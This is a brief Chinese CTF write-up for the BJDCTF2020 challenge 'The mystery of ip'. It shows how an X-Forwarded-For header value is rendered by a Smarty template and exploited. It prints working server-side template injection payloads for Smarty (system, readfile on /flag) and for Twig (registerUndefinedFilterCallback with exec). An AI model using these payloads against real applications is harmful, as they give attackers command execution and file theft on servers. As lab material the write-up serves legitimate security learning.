标签：mystery ip Smarty 语法 readfile BJDCTF2020 模板 注入

[BJDCTF2020]The mystery of ip Write-Up

知识点

• Smarty模板注入

• 能区分那个模板和其注入语法

题解

• 看见hint，抓包试一下，一般的ip都是通过请求头的cilent-ip、X-Forwarded-For等传过去的

• 发现没有这个请求头，自己加一个XFF写值看看是不是？发现变化

  

• 刚开始以为是sql注入，试了一下，貌似不对，可能是模板注入。记下下面这张图。用来区分那个模板，模板注入的语法非常多的。

  

• 经过测试，发现是Smarty模板

  

• {{system('ls /')}}

  

• {system("cat /flag")}

  {if readfile('/flag')}{/if}

总结

• 以前还做过Twig模板注入， 总结一下这两个的语法

• Twig：

  {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
  

• Smarty:

  {if php语句}{/if}

  {if readfile('文件路径')}{/if}

标签：mystery,ip,Smarty,语法,readfile,BJDCTF2020,模板,注入
来源： https://www.cnblogs.com/Q-and-K/p/16142034.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。